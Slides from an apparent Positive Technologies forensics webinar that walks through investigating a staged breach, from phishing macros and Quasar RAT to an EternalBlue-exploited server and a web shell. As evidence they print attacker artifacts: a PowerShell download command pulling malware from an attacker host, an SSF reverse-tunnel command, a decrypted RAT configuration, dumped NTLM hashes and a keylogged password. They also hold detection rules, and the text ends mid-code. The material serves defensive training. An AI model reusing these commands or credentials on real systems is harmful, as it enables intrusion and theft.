ptsecurity.com | Incident investigation: examination and analysis | Денис Гойденко, Александр Григорян, experts at Positive Technologies Expert Security Center

Page 1:

ptsecurity.com

Incident investigation: examination and analysis

Денис Гойденко, Александр Григорян

Experts, Positive Technologies Expert Security Center

Page 2:

PT Expert Security Center

• Threat Intelligence: 50+ tracked groups

• Incident Response: 50+ investigations per year

• Network Security: 5000+ network signatures

Expertise feeds into the products

Page 3:

Webinar plan

THEORY: What forensics is; Process overview; When to apply; Where to look; About the contest

PRACTICE: Where to start the analysis; Artifacts; Utilities; Analysis of non-formalizable data; Reversing

RESULTS: Data normalization; Identifying key events; Defining indicators

Page 4:

THEORY

Page 5:

What forensics is

Forensics = forensic (court) science

FORENSIC Science = the science of examining evidence

+ computer = COMPUTER FORENSICS

Process: COLLECTION -> EXAMINATION -> ANALYSIS -> REPORT

Source -> Data -> Information -> Evidence

Guide to Integrating Forensic Techniques into Incident Response: nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-86.pdf

Page 6:

As a diagram

Raw artifacts -> artifacts after parsing -> artifacts after filtering and normalization -> indicator of compromise

Page 7:

When to apply

• For responding to information security incidents,

• Investigating information security incidents,

• Identifying the causes of technical incidents,

• Monitoring,

• Data recovery,

• Data collection,

• Regulatory compliance

Page 8:

Where to look

RAM | PERSISTENT STORAGE | NETWORK TRAFFIC

OPERATING SYSTEMS: OS Windows, OS *nix, Mac OS, iOS, Android, Specialized

APPLICATIONS

(Figure: a stack of applications above each operating system)

Page 9:

Persistent storage

• SPI Flash

• HDD

• USB Flash/HDD

• Flash cards (MMC/SD/xD etc.)

• CD/DVD

• Backup tape

(Figure: raw bits -> files such as file1.exe, file2.evtx, file3.pf, file4.dll, file1.fil, fragmented.file, ... -> artifact categories: User Activity, Program Execution, Lateral Movement, Exploitation, ...)

Page 10:

RAM

(Figure: raw bits -> Page Tables, Page Directories, ... -> kernel objects: _FILE_OBJECT, _EPROCESS, _OBJECT_SYMBOLIC_LINK, _TOKEN, _ETHREAD, ...)

Page 11:

Network traffic

(Figure: raw bits -> packets -> sublayer field data for each packet)

Page 12:

How to collect

People: system administrators, users, managers

Technical means: Online/Offline, Virtual Images, RAM Dump

Information to gather: information about the information security tools in place, logical network map, physical network map, information about users, information about the technical implementation of processes, information about key events in the organization, information about security policies, information about business processes

Page 13:

How to collect: technical means

Online:

• Raw access to locked files

• Native tools (cmd/PS/bash)

• FastIR

• Onsite parsing / Only collect

• Mozilla MIG

• GRR

• Velociraptor

Virtual machines:

• *.vmem

• *.vmsn/*.vmss

• VBox: vboxmanage, --dbg, vboxdump.py

• QEMU – virsh

• Xen/KVM – libvmi

• Hyper-V – vm2dmp

RAM Dump:

• Not the system drive

• F-Response

• Memoryze

• FTK Imager

• EnCase

• Belkasoft RAM Capturer

• Winpmem

• Hardware (1394)

Offline:

• Physical write blockers

• OS-level write blockers

• Set of adapters

• Live Media

• Set of screwdrivers

• HDD adapter

• SATA cable

• TAP

• EWF

Page 14:

About the contest

Page 15:

About the contest

(Figure: contest infrastructure: Bot server, File server, Compromised hosts; Contestant: Data, Brief, Evidence)

Much Money site: web.archive.org/web/20190408082359/http://muchmoney.ga/

Page 16:

About Much Money

Page 17:

About Much Money

Page 18:

Page 19:

PRACTICE

Page 20:

Examination: input data

My boss said someone sent letters to our office in Bangladesh with invoices to pay for someone else’s bill. And the guys from Bangladesh sent the money. Also, the data from our knowledge base and the history of all transactions on operations are missing. Something strange is also happening with the site, the administrator cannot enter the administration panel. I need help with forensics.

I took images from hosts and servers. I can give you listings of files from these images, for which I will give you files that you request. I just need to know the MD5 file hash and I’ll give you a download link.

• Can you tell me more about the incident?

• How can I help you?

Emails | Knowledge base | Transaction history | Site

• So what actually happened?

Page 21:

Examination: emails

Page 22:

Examination: emails

+ LECmd = "opened it, but it didn't work":

Files list:

OfficeMalScanner: www.reconstructer.org/OfficeMalScanner

LECmd: ericzimmerman.github.io/LECmd

Page 23:

Examination: static analysis

olevba.py, 7z.exe, oledir.py

Oletools: www.decalage.info/python/oletools

Page 24:

Examination: static analysis

Unpacked result.docx: app.xml:

Page 25:

Examination: static analysis

Step 1: deBase64 the <Company> property; step 2: deBase64 again; ...; step 5: Empire identification

Page 26:

Examination: sandbox

Suricata PT Open Ruleset: github.com/ptresearch/AttackDetection/blob/master/PowerShell%20Empire/power_shell_empire.rules

Page 27:

Examination: Empire

Functionality (persistence):

NTUSER.DAT: Software\Microsoft\Windows\CurrentVersion

NTUSER.DAT: Software\Microsoft\Windows\CurrentVersion\Run

deBase64:

Page 28:

Examination

...but for the administrator it worked

Difference between the listing and $MFT

"opened it, but it didn't work":

Page 29:

Examination

Looking at the temp folder listing: in breadth and in depth

Working with indicators:

• hash list

• name list

The attacker's working folder is temp; widening the search: lateral movement, wce.exe, logging, psexec.exe, ADMIN PC

Page 30:

Examination

Attacker's working folder TEMP, examining the contents (ALL PC):

HoboCopy, TeamViewer, WCE

• Phishing

• Macros (VBS)

• Archiving (7z, Rar)

• Remote control, CLI (Empire, psexec)

• Remote control, GUI (TV, AmmyyAdmin, rdp)

• Account dumping (WCE)

• Scripting (PS, cmd)

• Copying locked files

+ DC, BOSS hosts

Wce: github.com/xymnal/wce

EmpireProject: github.com/EmpireProject/Empire

TeamViewer: www.teamviewer.com/

HoboCopy: github.com/candera/hobocopy

AmmyyAdmin: www.ammyy.com/

Page 31:

Examination

Attacker's working folder TEMP on ALL hosts (earliest wce): DC PC

wce.bat, wce

Page 32:

Examination

Attacker's working folder TEMP: DC PC, launcher1.bat, BOSS PC

BOSS PC SYSTEM registry hive: Proxy to 34.238.235.73:80

Some TV, Ammyy, reg-work (secr), static password on TV

Page 33:

Examination

Searching for all locations of the known IOCs -> a new folder: BOSS PC

We see the result of running WebHistoryPass:

Page 34:

Examination: BOSS PC

PECmd.exe – prefetch timeline

Viewing documents; launching WebHistoryPass

Which documents were opened?

PECmd: https://ericzimmerman.github.io/

Page 35:

Examination: BOSS PC

JLECmd.exe; OSFMount; empty

Free space: R.saver

JLECmd: ericzimmerman.github.io/

Page 36:

Examination: BOSS PC

Same CnC

USB attack vector:

Page 37:

Examination: BOSS PC

Emails:

Collecting emails:

Bangladesh: Fake:

Page 38:

ATT&CK Matrix

Initial Access: Spearphishing Attachment; Phishing Through Removable Storage

Execution: Command-Line Interface; Graphical User Interface; PowerShell; Scripting; Third-party Software; Trusted Developer Utilities; Windows Management Instrumentation; Windows Remote Management

Persistence: Accessibility Features; Registry Run Keys / Startup Folder

Privilege Escalation: Accessibility Features; Bypass User Account Control

Defense Evasion: Obfuscated Files or Information

Credential Access: Account Manipulation; Credential Dumping; Credentials in Files; Network Sniffing

Discovery: Browser Bookmark Discovery; File and Directory Discovery; Network Service Scanning; Network Share Discovery; Query Registry

Lateral Movement: Remote Desktop Protocol; Remote File Copy; Remote Services; Third-party Software; Windows Admin Shares; Windows Remote Management

Collection: Data from Local System; Data from Network Shared Drive; Email Collection

Exfiltration: Data Compressed; Data Encrypted; Exfiltration Over Alternative Protocol; Exfiltration Over Command and Control Channel

Command and Control: Commonly Used Port; Connection Proxy; Data Encoding; Remote Access Tools; Remote File Copy; Standard Application Layer Protocol; Standard Cryptographic Protocol

Impact: Stored Data Manipulation

ATT&CK Matrix for Enterprise: attack.mitre.org/

Page 39:

CASE 2

Page 40:

Examination: input data (repeat of the brief shown on page 20)

Page 41:

On the server WIN2003 there used to be a system for processing trade transactions, on which the transaction history was kept. They represent a folder with documents in recent years. The entire transaction archive is missing. We need them for further research.

This is the old transaction server. We lost all transactions from it.

Page 42:

Page 43:

Exploit EternalBlue: khalil-shreateh.com/khalil.shtml/it-highlights/8966-Microsoft-Windows-EternalBlue-SMB-Remote-Code-Execution--.html

MFT parser output (one record):

14809,5,True,5,5,.,pwned.txt,.txt,0,1,,False,False,False,False,False,False,Archive,DosWindows,28.03.2019 08:51:33,,28.03.2019 14:14:03,28.03.2019 08:51:33,28.03.2019 14:14:03,28.03.2019 08:51:33,28.03.2019 14:14:03,28.03.2019 08:51:33,0,387888150,466,,,

MFT parser: github.com/EricZimmerman/MFT

Windows Forensic Analysis: www.sans.org/security-resources/posters/windows-forensic-analysis/170/download

Page 44:

Page 45:

Path | LastModifiedTimeUTC

C:\Documents and Settings\Administrator\Application Data\services\sd.exe | 15.04.2019 13:24
C:\Documents and Settings\Administrator\Application Data\services\r.exe | 15.04.2019 13:18
C:\Documents and Settings\Administrator\Application Data\services\7.exe | 15.04.2019 12:28
C:\Documents and Settings\Administrator\Application Data\services\update.exe | 15.04.2019 12:18
C:\Documents and Settings\Administrator\Application Data\services\ms.exe | 29.03.2019 5:43
C:\Documents and Settings\Administrator\Application Data\services\gs.exe | 29.03.2019 5:22
C:\Documents and Settings\Administrator\Application Data\services\kiwi start.bat | 29.03.2019 5:03
C:\Documents and Settings\tsokihata\Local Settings\Temp\1\RuXNoMXqqKbW.bat | 28.03.2019 20:14
C:\Documents and Settings\tsokihata\Local Settings\Temp\1\RuXNoMXqqKbW.bat | 28.03.2019 20:14
C:\Documents and Settings\Administrator\Local Settings\Temp\XmwvDMRXMe3R.bat | 28.03.2019 20:14
C:\Documents and Settings\Administrator\Local Settings\Temp\XmwvDMRXMe3R.bat | 28.03.2019 20:14
C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe | 28.03.2019 14:14
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\spoolsvc_x86.exe | 28.03.2019 14:14
C:\Documents and Settings\tsokihata\Application Data\services\spoolsvc.exe | 28.03.2019 14:14
C:\Documents and Settings\Administrator\Application Data\services\spoolsvc.exe | 28.03.2019 14:14
C:\Documents and Settings\tsokihata\Application Data\services\spoolsvc.exe | 28.03.2019 14:14
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\spoolsvc_x86.exe | 28.03.2019 14:14
C:\Documents and Settings\Administrator\Application Data\services\spoolsvc.exe | 28.03.2019 14:14
C:\Documents and Settings\Administrator\Application Data\services\m.exe | 28.03.2019 13:25

AppCompatCacheParser (Application Compatibility Cache): ericzimmerman.github.io/

Page 46:

Page 47:

Microsoft wireless secrets:
No interfaces found
MUCHMONEY\tsokihata::8c528bc80d45f1e2b0d3662b97ebed58:5363dec787f9df3c135e551c92a0ec1d:::
MUCHMONEY\WIN2003$::00000000000000000000000000000000:e16033eeebfe3bed02e7084d72efa727:::
WIN2003\Administrator::c33eb318664f594a8d989d02e7f332d1:f3c6489a9ab82faf5ff959c97d7a4d40:::
MUCHMONEY\WIN2003$::00000000000000000000000000000000:e16033eeebfe3bed02e7084d72efa727:::
Administrator(current):500:c33eb318664f594a8d989d02e7f332d1:f3c6489a9ab82faf5ff959c97d7a4d40:::
ASPNET(current):1003:aad3b435b51404eeaad3b435b51404ee:9344f0479b9974e2add04e93904fd248:::
Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0(current):1001:aad3b435b51404eeaad3b435b51404ee:1e5697ec0b1a1b89fc429fa23327d8f4:::

Page 48:

mimikatz # lsadump::sam
Domain : WIN2003
SysKey : 362bc4a7806ee94ebfee8cb009c35ab5
Local SID : S-1-5-21-3089925616-1146513134-864702280
SAMKey : 8dbeb822499a12e3f6b99845677bcd11

RID : 000001f4 (500)
User : Administrator
Hash LM : c33eb318664f594a8d989d02e7f332d1
Hash NTLM: f3c6489a9ab82faf5ff959c97d7a4d40

RID : 000001f5 (501)
User : Guest

RID : 000003e9 (1001)
User : SUPPORT_388945a0
Hash NTLM: 1e5697ec0b1a1b89fc429fa23327d8f4

RID : 000003eb (1003)
User : ASPNET
Hash NTLM: 9344f0479b9974e2add04e93904fd248
lm - 0: 32dc9a9cc3912c522c2a1857bd9eefce
ntlm- 0: 9344f0479b9974e2add04e93904fd248

Page 49:

VirusTotal: www.virustotal.com/gui/file/4ceb14edd4a681997c99255b3b4895c0012a735e5f4ac0323e9c97f102ad5725/detection

Interactive Online Malware Analysis Sandbox: app.any.run/tasks/d49fb8b5-3da4-4f65-9706-b5a5e40968ce

Malware Initial Assessment: www.winitor.com/get.html

Page 50:

Quasar RAT

Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you.

Features: Compressed (QuickLZ) & Encrypted (TLS); Task Manager; File Manager; Remote Desktop; Remote Shell; Download & Execute; Upload & Execute; System Information; Keylogger (Unicode Support); Reverse Proxy (SOCKS5); Registry Editor

Remote Administration Tool for Windows: github.com/quasar/QuasarRAT

Downeks and Quasar RAT Used in Recent Targeted Attacks Against Governments: unit42.paloaltonetworks.com/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/

Operation Cloud Hopper: www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf

Analysis Report (AR18-352A): www.us-cert.gov/ncas/analysis-reports/AR18-352A

APT10 – Quasar RAT analysis: www.immersivelabs.com/2019/01/29/apt10-quasar-rat-analysis/

Page 51:

Page 52:

AES.SetDefaultKey("RoMfNZtSSIpcpGyRmEXa");
string a = AES.Decrypt("AatyrR7530jcEddqQ+/COFF8FXAxIWDi3E7SZf5FbWOk6kqERYpeylucj5ccrULb9ZFIw20J9vcTIbYe3BZwUbi2TE12nCa9aDyWX3E8Pj8=");
Console.WriteLine(a);

string Version = "1.3.0.0";
string Hosts = "muchm0ney.tk:80;";
int RECONNECTDELAY = 300;
string KEY = "GLfNNklGizWZMlHMlK+j9Q==";
string AUTHKEY = "z6kGPShxpE3GZdg5i2bKweS/wNopLz+fTdJO0JZ6cWWkmrDhJ1vwaKqHuO/FdXrNnoUKbnTlgeODYPpdm5cKEg==";
Environment.SpecialFolder SPECIALFOLDER = Environment.SpecialFolder.ApplicationData;
string DIRECTORY = Environment.GetFolderPath(SPECIALFOLDER);
string SUBDIRECTORY = "services";
string INSTALLNAME = "spoolsvc.exe";
bool HideSubDirectory = true;
bool HideFile = true;
string Mutex = "QSR_MUTEX_muchm0ney";
string RegistryName = "Windows Printer Spool Service";
bool HIDEFILE = true;
bool ENABLELOGGER = true;
string ENCRYPTIONKEY = "RoMfNZtSSIpcpGyRmEXa";
string TAG = "muchm0ney";
string LOGDIRECTORYNAME = "Logs";
bool HIDELOGDIRECTORY = true;
bool HIDEINSTALLSUBDIRECTORY = true;

Page 53:

AES.SetDefaultKey("RoMfNZtSSIpcpGyRmEXa", "z6kGPShxpE3GZdg5i2bKweS/wNopLz+fTdJO0JZ6cWWkmrDhJ1vwaKqHuO/FdXrNnoUKbnTlgeODYPpdm5cKEg==");
string l = AES.ReadLogFile(".\\Logs\\03-29-2019");

Log file 04-16-2019:

<p class="h">
<br>
<br>[<b>Connect to dc0.muchmoney.ga - 11:36</b>]</p>
<br>muchmoney.ga\tsokihata
<p class="h">[Tab]</p>Kur0$@w@
<p class="h">[Enter]</p>
<br>
<p class="h">

Page 54:

Network Forensics

alert tcp $EXTERNAL_NET :1024 -> $HOME_NET any (msg:"Non-Std TCP Server Traffic contains '|40 00 00 00|' (Quasar RAT Initial Packet)"; sid:10000; rev:1; flow:established,from_server; dsize:68; content:"|40 00 00 00|"; depth:4; fast_pattern;)

Page 55:

Page 56:

Page 57:

Page 58:

Page 59:

Page 60:

PwIntercept

Password Filter DLL: docs.microsoft.com/en-us/windows/win32/secmgmt/installing-and-registering-a-password-filter-dll

Windows credential theft: Methods and mitigations: citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.1032.2458&rep=rep1&type=pdf

THE PROJECTSAURON APT: media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf

Page 61:

EVT Log: attempt to install service

{
  "Source": "Security",
  "EventID": 601,
  "EventType": 8,
  "Computer": "WIN2003",
  "NumStrings": 8,
  "SID": "S-1-5-18",
  "TimeGenerated": 2019-03-28T06:17:29+00:00,
  "Strings": [
    "KUqy",
    "powershell -command (new-object System.Net.WebClient).DownloadFile(\\'http://muchm0ney.tk/spoolsvc.exe\\', \\'C:\\wmpub\\mwiislog\\spoolsvc.exe\\'",
    "16",
    "2",
    "LocalSystem",
    "ANONYMOUS LOGON",
    "NT AUTHORITY",
    "(0x0,0x41D63)"
  ],
  "RecordNumber": "4476",
  "TimeWritten": 1553753849
}

Parse::EventLog: https://metacpan.org/pod/Parse::EventLog
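Detection logic for service-installation events of the kind shown above, as an added example that is not part of the slides: it screens Event 601 records in the Parse::EventLog-style layout for the traits visible in this one (an interpreter command line with a download cradle and a URL as the service image, an image outside the standard program locations, installation over an anonymous logon). The records are constructed; the first reproduces the slide's event, the second is a made-up benign install for contrast, and the regexes are assumptions of this example.

```python
import re
from datetime import datetime

# Constructed sample records in the layout Parse::EventLog emits (see the slide).
# The first reproduces the slide's Event 601; the second is a made-up benign install.
SAMPLE_EVENTS = [
    {
        "Source": "Security", "EventID": 601, "EventType": 8, "Computer": "WIN2003",
        "SID": "S-1-5-18", "TimeGenerated": "2019-03-28T06:17:29+00:00",
        "Strings": [
            "KUqy",
            "powershell -command (new-object System.Net.WebClient).DownloadFile("
            "'http://muchm0ney.tk/spoolsvc.exe','C:\\wmpub\\mwiislog\\spoolsvc.exe'",
            "16", "2", "LocalSystem", "ANONYMOUS LOGON", "NT AUTHORITY", "(0x0,0x41D63)",
        ],
        "RecordNumber": "4476",
    },
    {
        "Source": "Security", "EventID": 601, "EventType": 8, "Computer": "WIN2003",
        "SID": "S-1-5-18", "TimeGenerated": "2019-03-28T09:02:11+00:00",
        "Strings": [
            "BackupAgent", "C:\\Program Files\\BackupAgent\\agent.exe",
            "16", "2", "LocalSystem", "Administrator", "WIN2003", "(0x0,0x2A1F5)",
        ],
        "RecordNumber": "4480",
    },
]

# Event 601 ("Attempt to install service") string layout:
# [service name, service file name, type, start type, service account, user, domain, logon id]
# The three patterns below are this example's own heuristics, not a vendor rule set.
INTERPRETER = re.compile(r"\b(powershell|cmd(\.exe)?|wscript|cscript|mshta|rundll32)\b", re.I)
DOWNLOAD_CRADLE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|bitsadmin|certutil", re.I)
STANDARD_DIR = re.compile(r'^"?[A-Z]:\\(Windows|Program Files)', re.I)


def parse_601(event: dict) -> dict:
    """Map the positional Strings of an Event 601 record to named fields."""
    s = event["Strings"]
    return {
        "record": event["RecordNumber"],
        "time": datetime.fromisoformat(event["TimeGenerated"]),
        "host": event["Computer"],
        "service": s[0], "image": s[1], "start_type": s[3],
        "account": s[4], "user": s[5], "domain": s[6],
    }


def score_service_install(event: dict) -> list:
    """Return the reasons an Event 601 looks suspicious (empty list = nothing flagged)."""
    if event.get("Source") != "Security" or event.get("EventID") != 601:
        return []
    rec = parse_601(event)
    reasons = []
    if INTERPRETER.search(rec["image"]):
        reasons.append("service image is an interpreter command line")
    if DOWNLOAD_CRADLE.search(rec["image"]):
        reasons.append("download cradle in service command")
    if re.search(r"https?://", rec["image"], re.I):
        reasons.append("URL in service command")
    if not STANDARD_DIR.match(rec["image"]):
        reasons.append("service image outside Windows/Program Files")
    if rec["user"].upper() == "ANONYMOUS LOGON":
        reasons.append("installed over an anonymous (null-session) logon")
    return reasons


def detect_service_installs(events: list) -> list:
    """Screen parsed events; return one alert per flagged service with its reasons."""
    alerts = []
    for ev in events:
        reasons = score_service_install(ev)
        if reasons:
            rec = parse_601(ev)
            alerts.append({
                "record": rec["record"], "host": rec["host"], "time": rec["time"].isoformat(),
                "service": rec["service"], "image": rec["image"], "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for a in detect_service_installs(SAMPLE_EVENTS):
        print(a["time"], a["host"], a["service"], "->", "; ".join(a["reasons"]))
```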

Page 62:

18.222.249.59 3389 29.03.2019 8:04

RDP-screenshotter: https://github.com/zer0-t/RDP-screenshotter/blob/master/RDP-screenshotter.sh

Page 63:

Analysis: update.exe

strings: golang

IDA: need main

Page 64:

Analysis: update.exe

GoUtils: gitlab.com/zaytsevgu/GoUtils2.0/

main_main

Page 65:

Analysis: update.exe

some bytes XOR

Page 66:

Memory Forensics

An advanced memory forensics framework: github.com/volatilityfoundation/volatility

Page 67:

\WINDOWS\system32\cmd.exe - r.exe a "C:\Documents and Settings\Administrator\Application Data\services\share" "C:\Documents and Settings\Administrator\Application Data\services\share" -pY23QyJCj%kak
\WINDOWS\system32\cmd.exe - r.exe "C:\Documents and Settings\Administrator\Application Data\services\share.rar" -hp23QyJCj%kAK
\WINDOWS\system32\cmd.exe - r.exe a "C:\Documents and Settings\Administrator\Application Data\services\share" "C:\Documents and Settings\Administrator\Application Data\services" -pY23QyJCj%kAK
Adminisystem32\cmd.exe - r.exe a "C:\Documents and Settings\Administrator\Application Data\services\share" "C:\Documents and Settings\Administrator\Application Data\services\share.rar" -pY23QyJCj%kak
C:\WINDOWS\system32\cmd.exe - r.exe a "C:\Documents and Settings\Administrator\Application Data\services\share" "C:\Documents and Settings\Administrator\Application Data\services" -pY23QyJCj%kAKkAAK*5

Page 68:

Search pattern (IPv4 header from the flags field onward, then the TCP ports):

40 00 ? 06 ? ? 0A 00 ? ? 0A 00 B9 68 ? ? 01 bd

• 40 00: Flags: Don't fragment

• ?: skip TTL

• 06: Proto: TCP - 6

• ? ?: skip header checksum

• 0A 00 ? ?: Src address: 10.0.*.*

• 0A 00 B9 68: Dst address: 10.0.185.104

• ? ?: any source port

• 01 bd: SMB Port: 445

RFC 791 - Internet Protocol: tools.ietf.org/html/rfc791#section-3.1

Assigned Internet Protocol Numbers: www.iana.org/assignments/protocol-numbers/protocol-numbers.xml

Page 69:

CyberChef Recipe: gchq.github.io/CyberChef/#recipe=From_Hex('Auto')To_Decimal('Space',false)&input=NDAgMDAgNDAgMDYgNzAgMjcgMEEgMDAgQjkgNjkgMEEgMDAgQjkgNjggQTYgMDQgMDEgQkQ
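The slide's wildcard pattern applied in code, as an added example that is not part of the slides: it carves IPv4/TCP header candidates out of an unstructured byte blob (a memory image or unallocated space) and decodes the fields the slide annotates. The blob is constructed and embeds the 18 bytes the CyberChef recipe decodes, preceded by six assumed IPv4 header bytes, plus a decoy packet to a different host.

```python
import re
import struct
from ipaddress import IPv4Address

# The wildcard pattern from the slide: IPv4 header from the flags field onward
# (flags/fragment, TTL, protocol, checksum, src, dst) followed by the TCP ports.
# "?" matches any single byte.
PATTERN = "40 00 ? 06 ? ? 0A 00 ? ? 0A 00 B9 68 ? ? 01 bd"

# Constructed sample blob (not real evidence): filler bytes, the first six IPv4
# header bytes (version/IHL, TOS, total length, ID; assumed values), the 18 bytes
# from the slide's CyberChef recipe, more filler, and a decoy packet to another host.
IP_HDR_PREFIX = bytes.fromhex("45 00 00 34 1a 2b")
SLIDE_BYTES = bytes.fromhex("40 00 40 06 70 27 0A 00 B9 69 0A 00 B9 68 A6 04 01 BD")
DECOY = bytes.fromhex("40 00 40 06 00 00 0A 00 B9 69 0A 00 B9 70 A6 04 01 BD")  # dst 10.0.185.112
SAMPLE_BLOB = b"\x00" * 37 + b"MZ\x90" + IP_HDR_PREFIX + SLIDE_BYTES + b"\xff" * 19 + DECOY + b"\x00" * 8


def pattern_to_regex(pattern: str) -> "re.Pattern[bytes]":
    """Compile a 'hex / ?' pattern (as written on the slide) into a bytes regex."""
    parts = []
    for tok in pattern.split():
        if tok == "?":
            parts.append(b".")                       # any byte (DOTALL below)
        else:
            parts.append(b"\\x%02x" % int(tok, 16))  # one literal byte
    return re.compile(b"".join(parts), re.DOTALL)


def decode_hit(blob: bytes, off: int) -> dict:
    """Decode header fields at a hit; 'off' is the IPv4 flags field (byte 6 of the header)."""
    flags_frag, ttl, proto, checksum = struct.unpack("!HBBH", blob[off:off + 6])
    src = IPv4Address(blob[off + 6:off + 10])
    dst = IPv4Address(blob[off + 10:off + 14])
    sport, dport = struct.unpack("!HH", blob[off + 14:off + 18])
    return {
        "ip_header_offset": off - 6,               # valid when the header has no options
        "dont_fragment": bool(flags_frag & 0x4000),
        "ttl": ttl,
        "proto": proto,                            # 6 = TCP (IANA protocol numbers)
        "checksum": checksum,
        "src": str(src),
        "dst": str(dst),
        "sport": sport,
        "dport": dport,
    }


def carve(blob: bytes, pattern: str = PATTERN) -> list:
    """Return a decoded header candidate for every pattern hit in the blob."""
    rx = pattern_to_regex(pattern)
    return [decode_hit(blob, m.start()) for m in rx.finditer(blob)]


if __name__ == "__main__":
    for hit in carve(SAMPLE_BLOB):
        print(hit)
```

The same function runs over a real dump by reading the file into `blob`; widening the pattern (for example dropping the destination bytes) returns every SMB header candidate rather than just those to 10.0.185.104.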

Page 70:

Page 71:

./auth.log.2.gz:Mar 27 23:04:37 lamp sudo: www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www/html/ssf/ssf-linux-x86_64-3.0.0 ; USER=root ; COMMAND=./ssf -g -R 127.0.0.1:445:10.0.185.104:445 54.165.150.118 -p 80
./auth.log.2.gz:Apr 10 14:21:52 lamp sudo: www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=./ssf -g -R 127.0.0.1:445:10.0.185.104:445 54.165.150.118 -p 80
./apache2/error.log.9.gz:[2019-03-27T23:05:43+03:00] [info] [ssf] connecting to <54.165.150.118:80>
./apache2/error.log.9.gz:[2019-03-27T23:05:43+03:00] [info] [ssf] running (Ctrl + C to stop)

-rwxrwx--- 1 root vboxsf 353 мар 27 2019 ./var/www/html/ssf/ssf-linux-x86_64-3.0.0/config.json
-rwxrwx--- 1 root vboxsf 80K мар 27 2019 ./var/www/html/sites/default/modules/connect.php
-rwxrwx--- 1 root vboxsf 353 мар 27 2019 ./var/www/html/config.json
-rwxrwx--- 1 root vboxsf 80K мар 27 2019 ./var/www/html/connect.php

Secure Socket Funneling: securesocketfunneling.github.io/ssf/#home

WebShell wso-4.2.5: github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php

./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:00:23 +0300] "GET /connect.php HTTP/1.1" 200 6588 "http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"

./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:04:37 +0300] "POST /connect.php HTTP/1.1" 200 5842 "http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"

./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:04:38 +0300] "GET /connect.php HTTP/1.1" 200 6588 "http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"

./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:05:43 +0300] "POST /connect.php HTTP/1.1" 200 5838 "http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"

Count  Date
77     28/Mar/2019
50     10/Apr/2019
42     26/Mar/2019
35     27/Mar/2019

Count  IP
96     18.222.249.59
64     77.243.191.35
43     31.44.93.2
1      103.244.3.7
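The "Count Date" and "Count IP" tables above come from aggregating the web server's access log. The following added Python example (not part of the webinar) parses Apache combined-format lines, builds the same per-day and per-IP counts, and picks out the POST requests to the web shell whose referer is the shell page itself, which is what an operator typing commands into the shell's UI looks like in the log. The sample lines are the four shown above plus one constructed line; the log file name and path are assumptions.

```python
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Apache "combined" log format, optionally prefixed by grep's "./file:" marker.
LOG_RE = re.compile(
    r'^(?:\./[^:]+:)?(?P<ip>\S+) \S+ \S+ '
    r'\[(?P<day>[^:\]]+):(?P<time>[^ \]]+)[^\]]*\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Sample input: the four lines from the slide plus one constructed line
# (18.222.249.59 on 28/Mar, made up here to give a second IP and day).
SAMPLE_LINES = [
    './access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:00:23 +0300] "GET /connect.php HTTP/1.1" 200 6588 "http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"',
    './access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:04:37 +0300] "POST /connect.php HTTP/1.1" 200 5842 "http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"',
    './access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:04:38 +0300] "GET /connect.php HTTP/1.1" 200 6588 "http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"',
    './access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:05:43 +0300] "POST /connect.php HTTP/1.1" 200 5838 "http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"',
    './access.log.9.gz:18.222.249.59 - - [28/Mar/2019:10:15:02 +0300] "GET /connect.php HTTP/1.1" 200 6588 "-" "curl/7.58.0"',  # constructed
]


def parse(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def count_by(lines: List[str], field: str) -> Counter:
    """Per-value counts for a parsed field, e.g. 'day' or 'ip' (the slide's tables)."""
    return Counter(r[field] for r in map(parse, lines) if r)


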